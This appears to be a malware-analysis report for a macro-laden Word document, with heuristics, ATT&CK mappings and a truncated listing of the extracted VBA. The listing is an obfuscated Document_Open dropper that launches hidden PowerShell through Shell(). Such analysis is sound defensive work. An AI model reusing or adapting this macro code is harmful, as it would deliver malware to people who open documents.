MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates a dropper or downloader functionality, aiming to execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-7144261-0' further supports this assessment.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-7144261-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7144261-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10869 bytes |
SHA-256: 1a5235f0ba4261b7a6e817254cfbde55a1d89d44cb7cce6397dde59d76224c86 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wkkPoMkDwwhA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LbPtb()
On Error Resume Next
vfSmGp = CDbl(JssKOk)
bdECk = CRvDum
ZNqcLs = Tan(53260)
lNOTjY = CDbl(MHARBv * CDbl(WWlUB + Int(wDSiBu * Rnd(34407)) * XzHYr * Log(63184 * DuHPwO - BAmzA + Fix(51))))
JBDzv = wjbwMq
RIbvX = Tan(26622)
LwZYvz = CDbl(TVTiwj)
aFIFaU = OfjNqk
UqpuP = Tan(53129)
GlMXJI = CDbl(fdjOsT * CDbl(iCNiL + Int(jKMob * Rnd(17752)) * TKKBQ * Log(16597 * dYuIEq - Uffak + Fix(51))))
PpdsZ = rHunl
KHfNwF = Tan(1021)
wSjsjz = CDbl(ZOcJw)
czbGO = zbkhmj
IBTwzB = Tan(58329)
jooGkw = CDbl(sKEPG * CDbl(ADwJCw + Int(GmsWas * Rnd(30314)) * ilpnw * Log(85203 * bwiwiQ - LIooI + Fix(51))))
zVMEuw = LzcBwu
cVPloj = Tan(60619)
PaVih = CDbl(pZOcd)
PljmG = iYnrBr
vljTi = Tan(41295)
KnfCsr = CDbl(YfTLlt * CDbl(QmdHX + Int(OkRzVZ * Rnd(4924)) * KCprV * Log(15775 * dfiZz - WiaTs + Fix(51))))
tiiBE = SwltM
LjRrn = Tan(90854)
LbPtb = WdDQG + VBA.Shell(fFdBE + Chr(BEVYHHWZT + vbKeyP + vlwBhTRD) + "owers" + HATtNZQjm + jcFNl + zVRYTjNQbE + YdilpPNY, 14496 - 14496)
LdcUQ = CDbl(UjZpi)
aEGoWj = DYDZKz
sFbiYM = Tan(58170)
cWMwZV = CDbl(zkYZdE * CDbl(Biwku + Int(zRtki * Rnd(18089)) * bOKiu * Log(90016 * zvucDN - YOTZi + Fix(51))))
wswIz = GKcIGw
cRGadi = Tan(21879)
KRswr = CDbl(utICQ)
qawUL = czjZVc
wtvzzd = Tan(39065)
SnwnHr = CDbl(bdIDRU * CDbl(Lwwtiv + Int(wQoWO * Rnd(86362)) * IjOvPD * Log(96536 * XwYSD - zjOAmn + Fix(51))))
coSRH = tupoiv
IWmjK = Tan(66588)
End Function
Private Sub Document_open()
On Error Resume Next
fOzHd = CDbl(vZtaqR)
JaaSJ = FdQOin
PaYOAM = Tan(86481)
msWva = CDbl(GAVnlv * CDbl(tnHEa + Int(mqXsO * Rnd(33036)) * rhGuwT * Log(46238 * SMpus - JaIKb + Fix(51))))
dzMjfU = WEmGz
ELpTv = Tan(30920)
RBWck = CDbl(wCupi)
CqiqL = EizEh
TvhTi = Tan(724)
NFzzv = CDbl(iniOzR * CDbl(zLiQB + Int(FrLiWN * Rnd(72097)) * bttkhO * Log(57848 * USLwC - miMEv + Fix(51))))
bENhQ = MjjhT
aRJstk = Tan(51067)
LbPtb
ZJAsr = CDbl(NziHuR)
cMfvi = wtDtaN
wziGAf = Tan(62157)
imtWoF = CDbl(NZVNN * CDbl(AKTlY + Int(jPZlA * Rnd(58255)) * sWfSa * Log(92906 * snfXC - apLfLn + Fix(51))))
FjBMR = pamEDs
RRYZf = Tan(21713)
AKCwt = CDbl(OBLvvR)
iOJOzp = VIMTwR
wwviSj = Tan(32601)
zUkzK = CDbl(rkOVP * CDbl(fMKSHK + Int(zBzJhA * Rnd(33099)) * diDaU * Log(18552 * hwJsNz - fowOE + Fix(51))))
SiiiK = NqcYQ
QurYRv = Tan(30755)
End Sub
Attribute VB_Name = "inVIksYhlG"
Function HATtNZQjm()
On Error Resume Next
NiiXo = mzOzJ
okndSP = ivfTCo
BNnaN = Tan(30928)
ndjUcc = CDbl(duDPzH)
bUTwJ = CDbl(lCAzn * CDbl(KnQIFF + Int(vjznzV * Rnd(64403)) * HIzjqT * Log(85181 * lZiRU - mjnpr + Fix(51))))
BFtja = Tan(84326)
jhYVHbhwo = "He" + "LL" + " . ( $Env:cOmS" + "Pec[4" + ",15,25]-J" + "oIn" + "'')([St" + "riNG]::JOI" + "N( '" + "',('107"
XYJNv = MzlChH
FvEFGo = frfXsj
OvSwiW = Tan(3894)
VIcmY = CDbl(wjfFuB)
niFCYw = CDbl(pPhKz * CDbl(fjZhtW + Int(NRacQA * Rnd(44714)) * FjbQv * Log(81194 * LPTzb - PjXuJ + Fix(51))))
cvuUWW = Tan(50685)
TKTMwwF = "}35_36R5" + "3D22}13_" + "8t1" + "11D114R111~" + "33v42" + "}56v98R32%4" + "5H3"
ijBzS = ujDDkZ
QlCnhZ = WfASA
hjjFK = Tan(1306)
mEBmF = CDbl(jAKzW)
fqXJl = CDbl(apckGu * CDbl(MSmwuI + Int(HsmVWf * Rnd(41859)) * pRkjhz * Log(61933 * odzNT - oBwsD + Fix(51))))
ILmlz = Tan(89352)
aYZEqIELf = "7_42" + "_44v59" + "t111v61" + "~46R33v43" + "H32}34v116v1" + "07_21_36_3Y63v2" + "8H" + "11" + "1_114Y111v33}42" + "H56Y98D32t45}3"
abkYJ = mUibv
wtMnrt = nDiBZ
QvVKBj = Tan(55969)
straoJ = CDbl(bwIkc)
YjflQK = CDbl(UziTb * CDbl(dEStc + Int(whjmo * Rnd(20332)) * BuszZj * Log(99278 * DchUSU - MBLsL + Fix(51))))
cINGif = Tan(49674)
YKjYI = "7v42H44R59" + "Y11" + "1%28%54%6" + "0Y59%42~34_" + "97t1}42v59" + "Y97}24t" + "42H" + "45_1" + "2_35v38v42t33" + "t59Y116R107"
QGEJak = awMvC
BLjqu = LpkCCI
SjtRbd = Tan(29851)
bqHMqt = CDbl(lrHLYc)
YpTklr = CD
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.